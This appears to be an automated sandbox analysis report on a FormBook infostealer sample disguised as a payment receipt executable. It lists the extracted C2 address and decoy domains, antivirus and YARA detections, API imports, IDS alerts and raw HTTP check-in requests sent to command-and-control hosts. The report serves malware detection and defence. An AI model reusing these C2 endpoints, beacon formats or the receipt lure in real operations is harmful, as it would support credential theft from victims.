Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp |
Malware Configuration Extractor: FormBook {"C2 list": ["www.bbyyn10.xyz/b0us/"], "decoy": ["wxoi.xyz", "boss-note-to-look-today.info", "rxgmarket.com", "vyfstudio.com", "insularrofioa.xyz", "psikologtenaysude.com", "hepatitiscsignssymptoms.space", "toadvalleyfarm.com", "rhinobeds.com", "joystoreworld.com", "wethinky.com", "cucciolamores.com", "finansresultation.com", "criptodigital.online", "cave21shop.com", "ryannaat.xyz", "xn--ngbr0em.com", "olympiaapartment.com", "asrendo.com", "dashmints.com", "hampadco.com", "hoanghuong.group", "yamamoto-d-c.net", "cynthiaessential.com", "malatirada.com", "c5group-th.com", "v9ayiditq3.com", "tucows.website", "patinamedicalgroup.com", "xn--vckvb6c8f088nlxg8mqrw1d.com", "securetravel.trade", "eachallness.center", "vongquaymembersshipvn.com", "sexbattu.com", "libertymattersmost.net", "improvfilmproduction.com", "cryptohealthplan.com", "pandabearsoftware.com", "mininoheya.com", "chimichael.com", "rescueandrestoreministries.net", "alookbehindtheseams.com", "unimedplanos.net", "bobazzing.com", "cabidat.xyz", "playgroundcrew.website", "tsoharformation.com", "ninjadigital.agency", "inkedbreadcompany.com", "kirieducationschool.com", "genitalestetikbodrum.com", "agronotion.com", "bentonvillesquareartist.com", "harekrishnajapayagna.com", "fflashes.net", "stogelair.com", "stkittsaquaculture.com", "peiyaousa.com", "publicschools.fail", "bankhelpassist.xyz", "ip-sat.com", "redeyeops.com", "kavirab.com", "thefurniturepractice-btr.com"]} |
Source: Yara match |
File source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY |
Source: 1.0.Betalingskvittering.exe.400000.0.unpack |
Avira: Label: TR/Patched.Ren.Gen2 |
Source: 1.1.Betalingskvittering.exe.400000.0.unpack |
Avira: Label: TR/Crypt.ZPACK.Gen |
Source: 7.2.cmd.exe.295d8d0.1.unpack |
Avira: Label: TR/Patched.Ren.Gen |
Source: 1.0.Betalingskvittering.exe.400000.3.unpack |
Avira: Label: TR/Patched.Ren.Gen2 |
Source: 0.2.Betalingskvittering.exe.f010000.2.unpack |
Avira: Label: TR/Crypt.ZPACK.Gen |
Source: 1.0.Betalingskvittering.exe.400000.5.unpack |
Avira: Label: TR/Crypt.ZPACK.Gen |
Source: 1.0.Betalingskvittering.exe.400000.2.unpack |
Avira: Label: TR/Patched.Ren.Gen2 |
Source: 1.0.Betalingskvittering.exe.400000.6.unpack |
Avira: Label: TR/Crypt.ZPACK.Gen |
Source: 1.0.Betalingskvittering.exe.400000.1.unpack |
Avira: Label: TR/Patched.Ren.Gen2 |
Source: 7.2.cmd.exe.31b796c.4.unpack |
Avira: Label: TR/Patched.Ren.Gen |
Source: 1.2.Betalingskvittering.exe.400000.0.unpack |
Avira: Label: TR/Crypt.ZPACK.Gen |
Source: 1.0.Betalingskvittering.exe.400000.4.unpack |
Avira: Label: TR/Crypt.ZPACK.Gen |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004035EB GetEncryptedFileVersionExt,lstrcatA,lstrlenA,lstrcmpiA,GetFileAttributesA,LoadImageA,RegisterClassA,SystemParametersInfoA,CreateWindowExA,ShowWindow,GetClassInfoA,GetClassInfoA,GetClassInfoA,RegisterClassA,DialogBoxParamA, |
0_2_004035EB |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,GetEncryptedFileVersionExt,DeleteFileA,CopyFileA,GetEncryptedFileVersionExt,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, |
0_2_004030FB |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00404F56 GetEncryptedFileVersionExt,OleInitialize,OleUninitialize, |
0_2_00404F56 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00401000 DefWindowProcA,GetEncryptedFileVersionExt,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint, |
0_2_00401000 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_0040140B GetEncryptedFileVersionExt, |
0_2_0040140B |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00402836 GetEncryptedFileVersionExt,GetEncryptedFileVersionExt, |
0_2_00402836 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00404FC2 GetEncryptedFileVersionExt,GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, |
0_2_00404FC2 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004047D3 GetDlgItem,GetDlgItem,GetDlgItem,SendMessageA,GetEncryptedFileVersionExt,GlobalAlloc,LoadBitmapA,SetWindowLongA,ImageList_Create,ImageList_AddMasked,SendMessageA,SendMessageA,SendMessageA,DeleteObject,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetWindowLongA,SetWindowLongA,ShowWindow,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ImageList_Destroy,GlobalFree,SendMessageA,SendMessageA,SendMessageA,InvalidateRect,ShowWindow,ShowWindow,GetDlgItem,ShowWindow, |
0_2_004047D3 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004012E2 GetEncryptedFileVersionExt, |
0_2_004012E2 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004058E6 GetShortPathNameA,CloseHandle,GetShortPathNameA,GetShortPathNameA,wsprintfA,GetEncryptedFileVersionExt,GetFileSize,GlobalAlloc,ReadFile,SetFilePointer,WriteFile,GlobalFree,CloseHandle, |
0_2_004058E6 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,GetEncryptedFileVersionExt,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, |
0_2_00404292 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00403F9C CheckDlgButton,GetDlgItem,SendMessageA,SendMessageA,GetEncryptedFileVersionExt,GetSysColor,SendMessageA,SendMessageA,lstrlenA,SendMessageA,SendMessageA,GetDlgItem,SendMessageA,GetDlgItem,SendMessageA,GetDlgItem,SendMessageA,LoadCursorA,LoadCursorA,SetCursor,SetCursor,ShellExecuteA,LoadCursorA,SetCursor,SendMessageA,SendMessageA, |
0_2_00403F9C |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004038B4 GetEncryptedFileVersionExt,GetEncryptedFileVersionExt,SetWindowTextA, |
0_2_004038B4 |
Source: |
Binary string: wntdll.pdbUGP source: Betalingskvittering.exe, 00000000.00000003.352403148.000000000F050000.00000004.00000001.sdmp, Betalingskvittering.exe, 00000001.00000002.408971728.0000000000940000.00000040.00000001.sdmp, cmd.exe, 00000007.00000002.613167685.0000000002BF0000.00000040.00000001.sdmp |
Source: |
Binary string: cmd.pdbUGP source: Betalingskvittering.exe, 00000001.00000002.409540986.00000000025F0000.00000040.00020000.sdmp, cmd.exe, 00000007.00000000.408444946.00000000002A0000.00000040.00020000.sdmp |
Source: |
Binary string: wntdll.pdb source: Betalingskvittering.exe, cmd.exe |
Source: |
Binary string: cmd.pdb source: Betalingskvittering.exe, 00000001.00000002.409540986.00000000025F0000.00000040.00020000.sdmp, cmd.exe |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00405E93 FindFirstFileA,FindClose, |
0_2_00405E93 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, |
0_2_004054BD |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 0_2_00402671 FindFirstFileA, |
0_2_00402671 |
Source: C:\Windows\SysWOW64\cmd.exe |
Code function: 7_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, |
7_2_002B245C |
Source: C:\Windows\SysWOW64\cmd.exe |
Code function: 7_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, |
7_2_002B68BA |
Source: C:\Windows\SysWOW64\cmd.exe |
Code function: 7_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, |
7_2_002AB89C |
Source: C:\Windows\SysWOW64\cmd.exe |
Code function: 7_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, |
7_2_002A85EA |
Source: C:\Windows\SysWOW64\cmd.exe |
Code function: 7_2_002C31DC FindFirstFileW,FindNextFileW,FindClose, |
7_2_002C31DC |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 4x nop then pop edi |
1_2_004161D7 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 4x nop then pop edi |
1_2_00416218 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 4x nop then pop edi |
1_2_004162E4 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 4x nop then pop ebx |
1_2_00406AB5 |
Source: C:\Users\user\Desktop\Betalingskvittering.exe |
Code function: 4x nop then pop edi |
1_2_0040C3E8 |
Source: Traffic |
Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49796 -> 35.186.238.101:80 |
Source: Traffic |
Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49796 -> 35.186.238.101:80 |
Source: Traffic |
Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49796 -> 35.186.238.101:80 |
Source: Traffic |
Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49802 -> 192.0.78.25:80 |
Source: Traffic |
Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49802 -> 192.0.78.25:80 |
Source: Traffic |
Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49802 -> 192.0.78.25:80 |
Source: Traffic |
Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 198.54.117.217:80 |
Source: Traffic |
Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 198.54.117.217:80 |
Source: Traffic |
Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 198.54.117.217:80 |
Source: C:\Windows\explorer.exe |
Network Connect: 198.54.117.217 80 |
|
Source: C:\Windows\explorer.exe |
Domain query: www.bbyyn10.xyz |
|
Source: C:\Windows\explorer.exe |
Domain query: www.chimichael.com |
|
Source: C:\Windows\explorer.exe |
Network Connect: 50.87.176.30 80 |
|
Source: C:\Windows\explorer.exe |
Network Connect: 104.21.45.211 80 |
|
Source: C:\Windows\explorer.exe |
Domain query: www.inkedbreadcompany.com |
|
Source: C:\Windows\explorer.exe |
Domain query: www.malatirada.com |
|
Source: C:\Windows\explorer.exe |
Network Connect: 23.227.38.74 80 |
|
Source: C:\Windows\explorer.exe |
Domain query: www.insularrofioa.xyz |
|
Source: C:\Windows\explorer.exe |
Domain query: www.bobazzing.com |
|
Source: C:\Windows\explorer.exe |
Network Connect: 35.186.238.101 80 |
|
Source: C:\Windows\explorer.exe |
Network Connect: 192.0.78.25 80 |
|
Source: C:\Windows\explorer.exe |
Network Connect: 142.4.98.67 80 |
|
Source: C:\Windows\explorer.exe |
Domain query: www.finansresultation.com |
|
Source: C:\Windows\explorer.exe |
Network Connect: 34.102.136.180 80 |
|
Source: C:\Windows\explorer.exe |
Network Connect: 104.21.40.182 80 |
|
Source: C:\Windows\explorer.exe |
Domain query: www.improvfilmproduction.com |
|
Source: C:\Windows\explorer.exe |
Domain query: www.rxgmarket.com |
|
Source: C:\Windows\explorer.exe |
Domain query: www.joystoreworld.com |
|
Source: C:\Windows\explorer.exe |
Domain query: www.tucows.website |
|
Source: C:\Windows\explorer.exe |
Domain query: www.olympiaapartment.com |
|
Source: global traffic |
HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=UBAh+VKzDimqRzzQdOOZ1/Gg43oaZbQvrcwMwq1yQU/lFkYIOb3JKuxkIDajXNdZJrP2FICqIQ== HTTP/1.1Host: www.bobazzing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?ER-tHjR=XOV60v1mqekMspvFU+0rKPDlyXSEiaRHynKCSPj1mvOyDA4pkDpWyOZGigF6MKTilgG5HmfPXw==&7nB=o48X HTTP/1.1Host: www.improvfilmproduction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=IHm7DXqJMOlXRiIvQCzDYuNSepBShfVGHLx9uFm0ofOXeJBRLox1psSi4oyGmyzdtrRcHIstiA== HTTP/1.1Host: www.olympiaapartment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X HTTP/1.1Host: www.malatirada.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ== HTTP/1.1Host: www.finansresultation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?ER-tHjR=Jj3KnWU2wHfhK+BlDqyhqSxeJEURVrle6TPUvLIqsqCsrOVtG9y5Fb94G4BOAz9I+plsxBUl/Q==&7nB=o48X HTTP/1.1Host: www.rxgmarket.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=gHtktScKtff4xVk3YRyKSNbVreJpCBobm1IhD3pS9EMOhSghOP3G/JLMMDt6OL3q2Wx4R+w5Og== HTTP/1.1Host: www.joystoreworld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X HTTP/1.1Host: www.bbyyn10.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=twm/1Bp31EH0Ih+sIHhgkxpvXOzGUgtw6+dZfZW7p7V/jiZPQGLQCd1AR8vD1TjU5s4Zo4ED0Q== HTTP/1.1Host: www.inkedbreadcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: GET /b0us/?ER-tHjR=NeMtgU3TUqkyahWOuk7UbKtu2f6OPWemmRyjHCkgk8lKJDy56aFQiEm/TJxXDeQeO1MybhrnKA==&7nB=o48X HTTP/1.1Host: www.insularrofioa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 15:50:36 GMTContent-Type: text/htmlContent-Length: 275ETag: "61774856-113"Via: 1.1 googleConnection: closeData Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html> |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 15:50:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html> |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 15:50:47 GMTContent-Type: text/htmlContent-Length: 275ETag: "6175c221-113"Via: 1.1 googleConnection: closeData Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html> |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 15:51:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bz3Z9xDKX9qXLWedJeYbmqe4wi2s4eO3jBbJQMiMyNHDIEsXgBZ7mHx2nwoUFffwMZYPSWVaKAbLAX3R7%2F6l%2FOwe3bPbgDMXRJvrUpWhVkm4%2BufBQexlKs5sYLWh88gtWNOc0g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a4d15a21fe05bf1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Ascii: 107<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rxgmarket.com Port 80</address></body></html> |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 27 Oct 2021 15:51:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: -1X-Request-ID: d3f121e3-1b05-4bdd-beea-f59c42222099X-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Dc: gcp-europe-west1CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6a4d15c3ce834e0e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400